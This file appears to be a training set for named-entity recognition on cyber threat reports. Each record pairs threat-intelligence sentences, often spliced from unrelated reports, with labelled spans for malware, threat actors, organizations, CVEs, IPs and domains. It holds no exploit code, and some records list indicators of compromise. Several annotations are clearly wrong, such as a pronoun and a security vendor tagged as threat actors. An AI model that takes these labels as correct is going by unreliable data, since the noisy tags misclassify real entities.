{"text": "FakeSpy package permissions . Its purpose remains to manipulate financial assets , such as transferring funds from bank accounts or taking over ATM infrastructures and instructing them to dispense cash at predetermined time intervals . Unit 42 researchers have been tracking an active campaign .", "spans": {"MALWARE: FakeSpy": [[0, 7]], "THREAT_ACTOR: Its": [[30, 33]], "ORGANIZATION: bank": [[115, 119]], "ORGANIZATION: Unit 42": [[236, 243]]}, "info": {"id": "cyberner_stix_train_000673", "source": "cyberner_stix_train"}}
{"text": "A recent report documents a group of attackers known as \" PittyTiger \" that appears to have been active since at least 2011 ; however , they may have been operating as far back as 2008 . By analyzing the attack infrastructure , Group-IB identified that MoneyTaker group continuously exfiltrates internal banking documentation to learn about bank operations in preparation for future attacks .", "spans": {"THREAT_ACTOR: group": [[28, 33]], "THREAT_ACTOR: attackers": [[37, 46]], "THREAT_ACTOR: PittyTiger": [[58, 68]], "ORGANIZATION: Group-IB": [[228, 236]], "THREAT_ACTOR: MoneyTaker group": [[253, 269]], "ORGANIZATION: bank": [[341, 345]]}, "info": {"id": "cyberner_stix_train_000674", "source": "cyberner_stix_train"}}
{"text": "What ’ s more , the user can not check the balance via mobile banking or change any settings there , because after receiving the command with code 40 , the Trojan prevents the banking app from running on the phone . After compromising an initial victim 's system ( patient 0 ) , the threat actors use the Baidu search engine to search for the victim 's organization name . We think the group has likely become more enterprising , and learned to take advantage of some details from their previous campaigns to maximize profit opportunities while exerting minimal effort . CrowdStrike Services recently investigated several Play ransomware intrusions where the common entry vector was suspected to be the Microsoft Exchange ProxyNotShell vulnerabilities CVE-2022 - 41040 and CVE-2022 - 41082 .", "spans": {"TOOL: Baidu search engine": [[305, 324]], "THREAT_ACTOR: CrowdStrike Services": [[571, 591]], "TOOL: Microsoft Exchange": [[703, 721]], "VULNERABILITY: ProxyNotShell vulnerabilities": [[722, 751]], "VULNERABILITY: CVE-2022 - 41040": [[752, 768]], "VULNERABILITY: CVE-2022 - 41082": [[773, 789]]}, "info": {"id": "cyberner_stix_train_000675", "source": "cyberner_stix_train"}}
{"text": "The majority of the code for TINYTYPHON is taken from the MyDoom worm and has been repurposed to find and exfiltrate documents . Chafer , uses Backdoor.Remexi.B .", "spans": {"TOOL: MyDoom worm": [[58, 69]], "MALWARE: Backdoor.Remexi.B": [[143, 160]]}, "info": {"id": "cyberner_stix_train_000676", "source": "cyberner_stix_train"}}
{"text": "While the motivation for each APT32 private sector compromise varied – and in some cases was unknown – the unauthorized access could serve as a platform for law enforcement , intellectual property theft , or anticorruption measures that could ultimately erode the competitive advantage of targeted organizations . The attacks we attribute to Scarlet Mimic have primarily targeted Uyghur and Tibetan activists as well as those who are interested in their causes .", "spans": {"THREAT_ACTOR: APT32": [[30, 35]], "ORGANIZATION: law enforcement": [[157, 172]], "THREAT_ACTOR: Scarlet Mimic": [[342, 355]], "ORGANIZATION: Uyghur": [[380, 386]], "ORGANIZATION: Tibetan activists": [[391, 408]]}, "info": {"id": "cyberner_stix_train_000677", "source": "cyberner_stix_train"}}
{"text": "It has the same functionality as the one described above but contains different text . Kaspersky Lab has detected a new method of first infection that uses a drive-by-download with a flash exploit ( CVE-2015-5119 , the one leaked from The Hacking Team incident ) . Kaspersky 's research notes that BlackOasis hacked into computers based in Saudi Arabia .", "spans": {"ORGANIZATION: Kaspersky Lab": [[87, 100]], "VULNERABILITY: flash exploit": [[183, 196]], "VULNERABILITY: CVE-2015-5119": [[199, 212]], "ORGANIZATION: Kaspersky": [[265, 274]], "THREAT_ACTOR: BlackOasis": [[298, 308]]}, "info": {"id": "cyberner_stix_train_000678", "source": "cyberner_stix_train"}}
{"text": "A lot of additional anti-sandbox checks are performed in this exact order : Check that the malware is not executed under the root folder of a drive Check that the malware file is readable from an external source Check that the hash of base path is not 3D6D62AF1A7C8053DBC8E110A530C679 Check that the full malware path contains only human readable characters ( “ a-z ” , “ A-Z ” , and “ 0-9 ” ) Check that no node in the full path contains the MD5 string of the malware FireEye tracks thousands of threat actors , but pays special attention to state-sponsored attackers who carry out advanced persistent threat ( APT ) attacks . However , this can be easily modified by the threat actor to deliver other malicious payloads . Adversaries may also use CLIs to install and run new software , including malicious tools that may be installed over the course of an operation .", "spans": {"ORGANIZATION: FireEye": [[469, 476]], "THREAT_ACTOR: threat actors": [[497, 510]], "THREAT_ACTOR: attackers": [[559, 568]], "THREAT_ACTOR: APT": [[612, 615]]}, "info": {"id": "cyberner_stix_train_000679", "source": "cyberner_stix_train"}}
{"text": "Package Name App Name com.whatsapp WhatsApp Messenger com.pugna.magiccall n/a org.telegram.messenger Telegram com.facebook.katana Facebook com.twitter.android Twitter jp.naver.line.android LINE : Free Calls & Messages com.instanza.cocovoice Coco com.beetalk BeeTalk com.gtomato.talkbox TalkBox Voice Messenger - PTT com.viber.voip Viber Messenger com.immomo.momo MOMO陌陌 com.facebook.orca Messenger – Text and Video Chat for Free com.skype.rover In July 2017 , APT41 initiated a TeamViewer session and transferred files that were later deleted . The origins of the Duke toolset names can be traced back to when researchers at Kaspersky Labs coined the term \" MiniDuke \" to identify the first Duke-related malware they found .", "spans": {"SYSTEM: WhatsApp": [[35, 43]], "SYSTEM: Messenger": [[44, 53], [300, 309], [337, 346], [388, 397]], "SYSTEM: Telegram": [[101, 109]], "SYSTEM: Facebook": [[130, 138]], "SYSTEM: Twitter": [[159, 166]], "SYSTEM: LINE": [[189, 193]], "SYSTEM: BeeTalk": [[258, 265]], "SYSTEM: TalkBox": [[286, 293]], "SYSTEM: Viber": [[331, 336]], "SYSTEM: MOMO陌陌": [[363, 369]], "THREAT_ACTOR: APT41": [[460, 465]], "ORGANIZATION: Kaspersky Labs": [[625, 639]], "MALWARE: MiniDuke": [[658, 666]], "MALWARE: Duke-related": [[691, 703]], "MALWARE: malware": [[704, 711]]}, "info": {"id": "cyberner_stix_train_000680", "source": "cyberner_stix_train"}}
{"text": "CTU researchers recommend that clients take appropriate precautions to minimize the risk of these types of attacks :", "spans": {"ORGANIZATION: CTU": [[0, 3]]}, "info": {"id": "cyberner_stix_train_000681", "source": "cyberner_stix_train"}}
{"text": "Magnitude EK activity then fell off the radar until Oct. 15 , 2017 , when it came back and began focusing solely on South Korea . The majority of APT37 activity continues to target South Korea , North Korean defectors , and organizations and individuals involved in Korean Peninsula reunification efforts .", "spans": {"TOOL: Magnitude EK": [[0, 12]], "ORGANIZATION: defectors": [[208, 217]]}, "info": {"id": "cyberner_stix_train_000682", "source": "cyberner_stix_train"}}
{"text": "To do this , it employs a number of specific commands via DNSMessenger . Careto 's Mask campaign we discovered relies on spear-phishing e-mails with links to a malicious website .", "spans": {"TOOL: DNSMessenger": [[58, 70]], "FILEPATH: Careto": [[73, 79]]}, "info": {"id": "cyberner_stix_train_000683", "source": "cyberner_stix_train"}}
{"text": "The \"Hyperlink Base\" must be extracted using another tool , strings is capable of obtaining this by looking for long strings .", "spans": {}, "info": {"id": "cyberner_stix_train_000684", "source": "cyberner_stix_train"}}
{"text": "It then decrypts a hardcoded encrypted value and sets the “ action ” parameter of the Intent using the setAction API . Ke3chang attackers are operating within China . Typically, the size of the ZIP file should be less than the uncompressed content or, in some cases, ZIP files will grow larger than the original files by a reasonable number of . The second step is simply the same exploit used in the second step of ProxyNotShell , allowing code execution through PowerShell remoting .", "spans": {"THREAT_ACTOR: Ke3chang": [[119, 127]], "THREAT_ACTOR: attackers": [[128, 137]], "VULNERABILITY: allowing code execution through PowerShell remoting": [[432, 483]]}, "info": {"id": "cyberner_stix_train_000685", "source": "cyberner_stix_train"}}
{"text": "Analysis of network traffic showed the devices were also communicating with an external command and control ( C2 ) server .", "spans": {"TOOL: command and control": [[88, 107]], "TOOL: C2": [[110, 112]]}, "info": {"id": "cyberner_stix_train_000686", "source": "cyberner_stix_train"}}
{"text": "In addition to domains of that type , there is evidence of other malware distribution being carried out on this infrastructure .", "spans": {}, "info": {"id": "cyberner_stix_train_000687", "source": "cyberner_stix_train"}}
{"text": "The company specializes in finance and natural resources specific to that region . The threat actors appear to be able to create and leverage multiple SWCs in parallel .", "spans": {"ORGANIZATION: finance": [[27, 34]], "MALWARE: SWCs": [[151, 155]]}, "info": {"id": "cyberner_stix_train_000688", "source": "cyberner_stix_train"}}
{"text": "One peculiar thing about the actor group behind this banking malware is that they have an “ official ” twitter account that they use to post promotional content ( even videos ) about the malware . In 2018 Machete reappeared with new code and new features . APT38 's increasingly aggressive targeting against banks and other financial institutions has paralleled North Korea 's worsening financial condition .", "spans": {"ORGANIZATION: twitter": [[103, 110]], "THREAT_ACTOR: Machete": [[205, 212]], "THREAT_ACTOR: APT38": [[257, 262]], "ORGANIZATION: banks": [[308, 313]], "ORGANIZATION: financial institutions": [[324, 346]]}, "info": {"id": "cyberner_stix_train_000689", "source": "cyberner_stix_train"}}
{"text": "The wide range of capabilities does n't limit this trojan to a specific malicious activity like a banking trojan or a ransomware . However , CTU researchers cannot dismiss the possibility that the LYCEUM could seek access to OT environments after establishing robust access to the IT environment . Although the APT38 's primary targets appear to be Financial Exchange banks and other financial organizations , they have also Financial Exchange targeted countries ' media organizations with a focus on the financial sector .", "spans": {"ORGANIZATION: CTU": [[141, 144]], "THREAT_ACTOR: LYCEUM": [[197, 203]], "THREAT_ACTOR: APT38": [[311, 316]], "ORGANIZATION: Financial Exchange banks": [[349, 373]], "ORGANIZATION: financial organizations": [[384, 407]], "ORGANIZATION: media organizations": [[465, 484]], "ORGANIZATION: financial sector": [[505, 521]]}, "info": {"id": "cyberner_stix_train_000690", "source": "cyberner_stix_train"}}
{"text": "After gaining access to a victim 's computer , PLATINUM installs its own custom-built malware to communicate with the compromised system , issue commands , and move laterally through the network . A report published by Kaspersky Labs in 2011 on NetTraveler also mentions the C2 servers were being hosted by Krypt Technolgies .", "spans": {"THREAT_ACTOR: PLATINUM": [[47, 55]], "TOOL: custom-built malware": [[73, 93]], "ORGANIZATION: Kaspersky Labs": [[219, 233]], "MALWARE: NetTraveler": [[245, 256]], "TOOL: C2": [[275, 277]]}, "info": {"id": "cyberner_stix_train_000691", "source": "cyberner_stix_train"}}
{"text": "In total , the attackers maintained a presence on the target 's network for four months between May and September 2015 . Examples as early as 2008 document malware operations against Tibetan non-governmental organizations ( NGOs ) that also targeted Falun Gong and Uyghur groups .", "spans": {"THREAT_ACTOR: attackers": [[15, 24]], "FILEPATH: document malware": [[147, 163]], "ORGANIZATION: Tibetan non-governmental organizations": [[183, 221]], "ORGANIZATION: NGOs": [[224, 228]], "ORGANIZATION: Falun Gong": [[250, 260]], "ORGANIZATION: Uyghur groups": [[265, 278]]}, "info": {"id": "cyberner_stix_train_000692", "source": "cyberner_stix_train"}}
{"text": "I focused my hunting on the PowerShell activity with Palo Alto Networks AutoFocus to determine whether it ’s worth digging into further based on “ uniqueness ” and functionality .", "spans": {"TOOL: PowerShell": [[28, 38]]}, "info": {"id": "cyberner_stix_train_000693", "source": "cyberner_stix_train"}}
{"text": "Aside from the inescapable irony of disguising a security-reducing Trojan as an ostensibly security-enhancing app , and the righteous affront to the whole concept of a VPN ’ s purpose a Trojan so disguised inspires , this represents an escalation in the variety of app types targeted by this campaign of bankbots in disguise . APT37 distributed SLOWDRIFT malware using a lure referencing the Korea Global Forum against academic and strategic institutions located in South Korea . One of the malware threads checks in an infinite loop if the mouse button was pressed and then also increments the integer iterator . This article is based on research by Marcelo Rivero , Malwarebytes ' ransomware specialist , who monitors information published by ransomware gangs on their Dark Web sites .", "spans": {"THREAT_ACTOR: APT37": [[327, 332]], "TOOL: SLOWDRIFT malware": [[345, 362]], "ORGANIZATION: academic": [[419, 427]], "ORGANIZATION: strategic institutions": [[432, 454]], "ORGANIZATION: Marcelo Rivero": [[651, 665]], "ORGANIZATION: Malwarebytes ' ransomware specialist": [[668, 704]], "THREAT_ACTOR: ransomware gangs": [[745, 761]], "ORGANIZATION: Dark Web sites": [[771, 785]]}, "info": {"id": "cyberner_stix_train_000695", "source": "cyberner_stix_train"}}
{"text": "Urgent_Information_Report.exe :", "spans": {"FILEPATH: Urgent_Information_Report.exe": [[0, 29]]}, "info": {"id": "cyberner_stix_train_000696", "source": "cyberner_stix_train"}}
{"text": "EventBot targets users of over 200 different financial applications , including banking , money transfer services , and crypto-currency wallets . If a bot was installed on a network that was of interest to the hacking group , this bot was then used to upload one of the remote access programs . Analysis of the operational times of the group 's activities indicates that it is probably centered around China Standard TIME ( UTC +8 ) .", "spans": {"MALWARE: EventBot": [[0, 8]], "MALWARE: bot": [[151, 154]]}, "info": {"id": "cyberner_stix_train_000697", "source": "cyberner_stix_train"}}
{"text": "Though there is no functionality to collect this information in the ransomware itself , the ransomware is deployed by INDRIK SPIDER in parallel with Dridex malware , and the Dridex malware contains modules that may be used to collect information from infected hosts . ScarCruft is a relatively new APT group ; victims have been observed in several countries , including Russia , Nepal , South Korea , China , India , Kuwait and Romania .", "spans": {"TOOL: Dridex malware": [[149, 163], [174, 188]], "THREAT_ACTOR: ScarCruft": [[268, 277]]}, "info": {"id": "cyberner_stix_train_000698", "source": "cyberner_stix_train"}}
{"text": "Mobile malware is a significant risk for organizations and consumers alike , and must be considered when protecting personal and business data . This technique hides the true C2 server from researchers that do not have access to both the rastls.dll and Sycmentec.config files . Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 .", "spans": {"MALWARE: rastls.dll": [[238, 248]], "MALWARE: Sycmentec.config files": [[253, 275]], "FILEPATH: malicious Word documents": [[299, 323]], "VULNERABILITY: exploit": [[340, 347]], "SYSTEM: Windows": [[352, 359]], "TOOL: OLE Automation Array Remote Code Execution": [[360, 402]], "VULNERABILITY: Vulnerability": [[403, 416]], "VULNERABILITY: CVE-2014-6332": [[428, 441]]}, "info": {"id": "cyberner_stix_train_000699", "source": "cyberner_stix_train"}}
{"text": "Readers should carefully think through the risks before changing this default setting . We concluded that Lazarus Group was responsible for WannaCry , a destructive malware . APT33 : 64.251.19.216 [REDACTED].redirectme.net . Cisco Secure Email ( formerly Cisco Email Security ) can block malicious emails sent by threat actors as part of their campaign .", "spans": {"THREAT_ACTOR: Lazarus Group": [[106, 119]], "TOOL: WannaCry": [[140, 148]], "THREAT_ACTOR: APT33": [[175, 180]], "IP_ADDRESS: 64.251.19.216": [[183, 196]], "DOMAIN: [REDACTED].redirectme.net": [[197, 222]], "SYSTEM: Cisco Secure Email": [[225, 243]], "SYSTEM: Cisco Email Security": [[255, 275]]}, "info": {"id": "cyberner_stix_train_000700", "source": "cyberner_stix_train"}}
{"text": "FrozenCell : Multi-Platform Surveillance Campaign Against Palestinians October 5 , 2017 FrozenCell has been seen masquerading as various well known social media and chat applications as well as an app likely only used by Palestinian or Jordanian students sitting their 2016 general exams . The malware has started targeting corporate , SMB , investment banking and consumer accounts at banks , including some in Portugal and the U.S. , in addition to Poland , according to researchers at IBM 's X-Force team . WEBC2 backdoors are probably the most well-known kind of APT1 backdoor , and are the reason why some security companies refer to APT1 as the “ Comment Crew. ” A WEBC2 backdoor is designed to retrieve a webpage from a C2 server . So far , there 's no evidence that customers of the infected game companies were targeted , although in at least one case , malicious code was accidentally installed on gamers ' computers by one of the infected victim companies .", "spans": {"MALWARE: FrozenCell": [[0, 10], [88, 98]], "TOOL: SMB": [[336, 339]], "ORGANIZATION: investment banking": [[342, 360]], "ORGANIZATION: banks": [[386, 391]], "ORGANIZATION: IBM 's X-Force": [[488, 502]], "MALWARE: WEBC2 backdoors": [[510, 525]], "THREAT_ACTOR: APT1": [[567, 571], [639, 643]], "MALWARE: WEBC2 backdoor": [[671, 685]], "TOOL: C2": [[727, 729]], "ORGANIZATION: customers of the infected game companies": [[774, 814]], "MALWARE: malicious code": [[863, 877]], "ORGANIZATION: gamers ' computers": [[908, 926]], "THREAT_ACTOR: the infected victim companies": [[937, 966]]}, "info": {"id": "cyberner_stix_train_000701", "source": "cyberner_stix_train"}}
{"text": "Neptun is installed on Microsoft Exchange servers and is designed to passively listen for commands from the attackers . However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers .", "spans": {"MALWARE: Neptun": [[0, 6]], "THREAT_ACTOR: attackers": [[108, 117]], "ORGANIZATION: CSIS": [[170, 174]], "MALWARE: Carbanak": [[208, 216]], "ORGANIZATION: customers": [[246, 255]]}, "info": {"id": "cyberner_stix_train_000702", "source": "cyberner_stix_train"}}
{"text": "La Poste - La Poste is a public limited postal service company in France . PlugX is a modular structured malware that has many different operational plugins such as communication compression and encryption , network enumeration , files interaction , remote shell operations and more . Starting in February 2018 , Palo Alto Networks identified a campaign of attacks performed by members of Gorgon Group targeting governmental organizations in the United Kingdom , Spain , Russia , and the United States .", "spans": {"ORGANIZATION: La Poste": [[0, 8]], "MALWARE: PlugX": [[75, 80]], "ORGANIZATION: Palo Alto Networks": [[313, 331]], "THREAT_ACTOR: Gorgon Group": [[389, 401]], "ORGANIZATION: governmental organizations": [[412, 438]]}, "info": {"id": "cyberner_stix_train_000703", "source": "cyberner_stix_train"}}
{"text": "Written in pure C language , Canhadr/Ndriver provides full access to the hard drive and operating memory despite device security restrictions , and carries out integrity control of various system components to avoid debugging and security detection . Our research indicates that it has started targeting Japanese users .", "spans": {"MALWARE: Canhadr/Ndriver": [[29, 44]], "ORGANIZATION: Japanese users": [[304, 318]]}, "info": {"id": "cyberner_stix_train_000704", "source": "cyberner_stix_train"}}
{"text": "Error when trying to debug the malware using the Android Studio IDE . Its targets include the military organizations and governments of countries with national interests in the South China Sea , including some within the U.S. defense industrial base . In principle , the distribution of victims should match the distribution of ASUS users around the world . The UK has already sanctioned the GRU after their appalling actions in Salisbury , and has frozen more than £ 940 billion worth of bank assets and £ 117 billion in personal net worth from oligarchs and their family members who fund Putin ’s war machine .", "spans": {"SYSTEM: Android Studio IDE": [[49, 67]], "ORGANIZATION: military organizations": [[94, 116]], "ORGANIZATION: governments": [[121, 132]], "ORGANIZATION: defense industrial base": [[226, 249]], "THREAT_ACTOR: GRU": [[392, 395]]}, "info": {"id": "cyberner_stix_train_000705", "source": "cyberner_stix_train"}}
{"text": "Corporations can protect themselves from these side-channel attacks by deploying client-based two-factor authentication , such as Duo Security . PwC UK and BAE Systems assess it is highly likely that APT10 is a China-based threat actor with a focus on espionage and wide ranging information collection . OceanLotus : 9112f23e15fdcf14a58afa424d527f124a4170f57bd7411c82a8cdc716f6e934 Loader #2 . Some researchers believe that it is linked to TA570 because of the similarity of delivering method between it and trojan .", "spans": {"SYSTEM: Duo Security": [[130, 142]], "ORGANIZATION: PwC UK": [[145, 151]], "ORGANIZATION: BAE Systems": [[156, 167]], "THREAT_ACTOR: APT10": [[200, 205]], "THREAT_ACTOR: threat actor": [[223, 235]], "THREAT_ACTOR: espionage": [[252, 261]], "THREAT_ACTOR: OceanLotus": [[304, 314]], "FILEPATH: 9112f23e15fdcf14a58afa424d527f124a4170f57bd7411c82a8cdc716f6e934": [[317, 381]], "ORGANIZATION: researchers": [[399, 410]], "THREAT_ACTOR: TA570": [[440, 445]]}, "info": {"id": "cyberner_stix_train_000706", "source": "cyberner_stix_train"}}
{"text": "The zombie host initiates the scan — another routine from previous campaigns — but updated with a larger set of parameters and programmed to run in the background .", "spans": {}, "info": {"id": "cyberner_stix_train_000707", "source": "cyberner_stix_train"}}
{"text": "Icons of the apps that Bouncing Golf ’ s operators repackaged ( top ) and a comparison of packages between the original legitimate app ( bottom left ) and GolfSpy ( bottom right ) Figure 3 . After publishing our initial series of blogposts back in 2016 , we have continued to track the ScarCruft threat actor . Interestingly , following some open-source publications about them , the FIN7 operators seems to have developed a homemade builder of malicious Office document using ideas from ThreadKit , which they employed during the summer of 2018 . Think of cloud storage solutions like Dropbox or Plex , for example .", "spans": {"MALWARE: Bouncing Golf": [[23, 36]], "MALWARE: GolfSpy": [[155, 162]], "THREAT_ACTOR: FIN7": [[384, 388]], "TOOL: Office": [[455, 461]], "MALWARE: ThreadKit": [[488, 497]], "TOOL: Dropbox": [[586, 593]], "TOOL: Plex": [[597, 601]]}, "info": {"id": "cyberner_stix_train_000708", "source": "cyberner_stix_train"}}
{"text": "A second attack that targeted the host 154.46.32.129 started on March 14 , 2017 at 14:44:42 GMT . BRONZE BUTLER has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks .", "spans": {"THREAT_ACTOR: BRONZE BUTLER": [[98, 111]], "TOOL: emails": [[130, 136]], "TOOL: Flash": [[142, 147], [234, 239]], "MALWARE: Daserf": [[194, 200]], "MALWARE: malware": [[201, 208]], "VULNERABILITY: exploits": [[240, 248]]}, "info": {"id": "cyberner_stix_train_000709", "source": "cyberner_stix_train"}}
{"text": "In this same time frame , APT10 also targeted a U.S. law firm and an international apparel company , likely to gather information for commercial advantage . Fresh from targeting banks in Poland , the banking Trojan has reportedly begun taking aim at banks in Germany .", "spans": {"THREAT_ACTOR: APT10": [[26, 31]], "ORGANIZATION: U.S. law firm": [[48, 61]], "ORGANIZATION: apparel company": [[83, 98]], "ORGANIZATION: banks": [[178, 183], [250, 255]], "ORGANIZATION: banking": [[200, 207]], "MALWARE: Trojan": [[208, 214]]}, "info": {"id": "cyberner_stix_train_000710", "source": "cyberner_stix_train"}}
{"text": "In the past , we have seen other activity groups like LEAD employ a similar attacker technique named “ proxy-library ” to achieve persistence , but not with this professionalism . CTU researchers conclude that COBALT GYPSY created the persona to gain unauthorized access to targeted computer networks via social engineering . The resource containing the expected process name ( ICON/1 ) is XORed with the first byte of the legitimate C:\\Windows\\system.ini file – 0x3B ( \" ; \" ) . [ As the documentary points out , the domain AshleyMadisonSucks.com was eventually transferred to Ashley Madison , which then shrewdly used it for advertising and to help debunk theories about why its service was supposedly untrustworthy ] .", "spans": {"ORGANIZATION: CTU": [[180, 183]], "THREAT_ACTOR: COBALT GYPSY": [[210, 222]], "ORGANIZATION: social engineering": [[305, 323]], "FILEPATH: C:\\Windows\\system.ini": [[434, 455]]}, "info": {"id": "cyberner_stix_train_000711", "source": "cyberner_stix_train"}}
{"text": "While investigating the OnionDuke variant being spread by the malicious Tor node , we also identified another OnionDuke variant that appeared to have successfully compromised multiple victims in the ministry of foreign affairs of an Eastern European country during the spring of 2014 .", "spans": {"MALWARE: OnionDuke": [[24, 33], [110, 119]], "TOOL: Tor": [[72, 75]]}, "info": {"id": "cyberner_stix_train_000712", "source": "cyberner_stix_train"}}
{"text": "State Machines Since various carriers implement the billing process differently , Bread has developed several variants containing generalized state machines implementing all possible steps . Bahamut spearphishing attempts have also been accompanied with SMS messages purporting to be from Google about security issues on their account , including a class 0 message or \" flash text \" . Finally the driver is started using the ZwLoadDriver native API . Most of the time , unsolicited messages from various people are the first entry point .", "spans": {"MALWARE: Bread": [[82, 87]], "ORGANIZATION: Google": [[289, 295]]}, "info": {"id": "cyberner_stix_train_000713", "source": "cyberner_stix_train"}}
{"text": "The Cybereason Nocturnus team has concluded that EventBot is designed to target over 200 different banking and finance applications , the majority of which are European bank and crypto-currency exchange applications . The first attack started in early July with a ShimRatReporter payload . The targeting of this individual suggests the actors are interested in breaching the French Ministry of Foreign Affairs itself or gaining insights into relations between France and Taiwan .", "spans": {"ORGANIZATION: Cybereason Nocturnus": [[4, 24]], "MALWARE: EventBot": [[49, 57]], "MALWARE: ShimRatReporter": [[264, 279]], "ORGANIZATION: individual": [[312, 322]], "THREAT_ACTOR: actors": [[336, 342]]}, "info": {"id": "cyberner_stix_train_000714", "source": "cyberner_stix_train"}}
{"text": "Instead , it blocks access to devices by displaying a screen that appears over every other window , such that the user can ’ t do anything else . As we continued to investigate , it became apparent that Gorgon Group had been consistently targeting worldwide governmental organizations operating within Pakistan . consecutive if-statement flattened blocks ) FULLHOUSE.DOORED ( com.docker.vmnat , npx - cli , us.zoom . ZoomUpdate )", "spans": {"THREAT_ACTOR: Gorgon Group": [[203, 215]], "ORGANIZATION: governmental organizations": [[258, 284]], "TOOL: FULLHOUSE.DOORED": [[357, 373]]}, "info": {"id": "cyberner_stix_train_000715", "source": "cyberner_stix_train"}}
{"text": "Named pipes are a Windows inter-process communication method .", "spans": {"SYSTEM: Windows": [[18, 25]]}, "info": {"id": "cyberner_stix_train_000716", "source": "cyberner_stix_train"}}
{"text": "When reviewing network perimeter logs for the IP S-PROT addresses , organizations may find numerous instances of these IP S-PROT addresses attempting to connect to their systems .", "spans": {"TOOL: IP S-PROT addresses": [[46, 65], [119, 138]]}, "info": {"id": "cyberner_stix_train_000717", "source": "cyberner_stix_train"}}
{"text": "The most recent version of Ginp ( at the time of writing ) was detected at the end of November 2019 . In this same time frame , APT10 also targeted a U.S. law firm and an international apparel company , likely to gather information for commercial advantage . Using AutoFocus , we were able to identify the link among Daserf and two other threats , 9002 and Invader .", "spans": {"MALWARE: Ginp": [[27, 31]], "THREAT_ACTOR: APT10": [[128, 133]], "ORGANIZATION: U.S. law firm": [[150, 163]], "ORGANIZATION: apparel company": [[185, 200]], "ORGANIZATION: AutoFocus": [[265, 274]], "MALWARE: Daserf": [[317, 323]], "MALWARE: 9002": [[348, 352]], "MALWARE: Invader": [[357, 364]]}, "info": {"id": "cyberner_stix_train_000718", "source": "cyberner_stix_train"}}
{"text": "To better understand how the adversary was operating and what other actions they had performed , CTU researchers examined cmd.exe and its supporting processes to uncover additional command line artifacts .", "spans": {"ORGANIZATION: CTU": [[97, 100]], "FILEPATH: cmd.exe": [[122, 129]]}, "info": {"id": "cyberner_stix_train_000719", "source": "cyberner_stix_train"}}
{"text": "Downeks can be instructed with the “ img ” command to capture the victim screen and transmit it back to the C2 .", "spans": {"MALWARE: Downeks": [[0, 7]], "TOOL: the “ img ” command": [[31, 50]], "TOOL: C2": [[108, 110]]}, "info": {"id": "cyberner_stix_train_000720", "source": "cyberner_stix_train"}}
{"text": "The beaconing is sent to the URL http : // /api/v2/get.php with an interval of 60 seconds . DustySky has been developed and used since May 2015 by Molerats ( aka \" Gaza cybergang \" ) , a terrorist group whose main objective in this campaign is intelligence gathering . DUDELL : File Type :M icrosoft Excel 97 – I-TOO 2 E-IDTY003 Document . By monitoring for indicators of compromise , organizations can detect attacks and act quickly to prevent breaches from occurring or limit damages by stopping attacks in earlier stages .", "spans": {"TOOL: DustySky": [[92, 100]], "THREAT_ACTOR: Molerats": [[147, 155]], "THREAT_ACTOR: Gaza cybergang": [[164, 178]], "THREAT_ACTOR: terrorist group": [[187, 202]], "MALWARE: DUDELL": [[269, 275]], "TOOL: :M icrosoft Excel 97": [[288, 308]]}, "info": {"id": "cyberner_stix_train_000721", "source": "cyberner_stix_train"}}
{"text": "It protects itself from deletion by requesting Device Administrator rights during the installation . The mothership server is generally a VPS , which runs the Control panel software used to interact with the victims . Remote desktop . Organizations can validate their security controls using the following actions with Mandiant Security Validation .", "spans": {"TOOL: VPS": [[138, 141]], "TOOL: Remote desktop": [[218, 232]]}, "info": {"id": "cyberner_stix_train_000722", "source": "cyberner_stix_train"}}
{"text": "mobile_treats_2013_04s The number of mobile banking Trojans in our collection Mobile banking Trojans can run together with Win-32 Trojans to bypass the two-factor authentication – mTAN theft ( the theft of banking verification codes that banks send their customers in SMS messages ) . which has been active since at least 2011 . The Winnti malware usually contains a configuration specifying a campaign ID and a C&C URL . Monitor systems with access to OT resources for the creation of legitimate temporary folders , files , artifacts , and external libraries required as evidence of the execution of packaged Python scripts .", "spans": {"SYSTEM: Win-32": [[123, 129]], "MALWARE: Winnti": [[333, 339]], "TOOL: C&C": [[412, 415]]}, "info": {"id": "cyberner_stix_train_000723", "source": "cyberner_stix_train"}}
{"text": "The Shadow Brokers claimed to have hacked the Equation Group and stolen some of its hacking tools . Throughout 2017 and 2018 , Fxmsp established a network of trusted proxy resellers to promote their breaches on the criminal underground .", "spans": {"THREAT_ACTOR: Fxmsp": [[127, 132]]}, "info": {"id": "cyberner_stix_train_000724", "source": "cyberner_stix_train"}}
{"text": "All of the Play Store pages we identified and all of the decoys of the apps themselves are written in Italian . This technique was observed in previous Clayslide documents to access the script variant of the Helminth Trojan in earlier OilRig attacks . Download binary disguised has a picture from Google Drive and execute it . For example , the government was credited with leading a multicountry operation to hack the ransomware group REvil , forcing it offline .", "spans": {"SYSTEM: Play Store": [[11, 21]], "TOOL: Clayslide documents": [[152, 171]], "TOOL: Google Drive": [[297, 309]], "ORGANIZATION: government": [[345, 355]], "THREAT_ACTOR: ransomware group REvil": [[419, 441]]}, "info": {"id": "cyberner_stix_train_000725", "source": "cyberner_stix_train"}}
{"text": "Many of the 10 million infected phones are running old versions of Android and reside in China ( 1.6 million ) and India ( 1.35 million ) . Microsoft addressed the SMBv1 vulnerabilities in March 2017 with Security Bulletin MS17-010 . APT33 : 188.165.4.81 svcexplores.com . The MOVEit data breaches had widespread impacts , affecting everything from the Oregon DMV and Louisiana OMV ( Office of Motor Vehicles)—including the leak of nearly 10 million drivers ' licenses — to the University of Rochester and multiple corporations .", "spans": {"SYSTEM: Android": [[67, 74]], "ORGANIZATION: Microsoft": [[140, 149]], "VULNERABILITY: SMBv1 vulnerabilities": [[164, 185]], "THREAT_ACTOR: APT33": [[234, 239]], "IP_ADDRESS: 188.165.4.81": [[242, 254]], "DOMAIN: svcexplores.com": [[255, 270]], "TOOL: MOVEit": [[277, 283]], "ORGANIZATION: University of Rochester": [[478, 501]], "ORGANIZATION: multiple corporations": [[506, 527]]}, "info": {"id": "cyberner_stix_train_000726", "source": "cyberner_stix_train"}}
{"text": "Some attacker tools were used to almost exclusively target organizations within APAC . It's possible TG-3390 used a waterhole to infect data center employees .", "spans": {"THREAT_ACTOR: attacker": [[5, 13]], "THREAT_ACTOR: TG-3390": [[101, 108]], "ORGANIZATION: data center employees": [[136, 157]]}, "info": {"id": "cyberner_stix_train_000727", "source": "cyberner_stix_train"}}
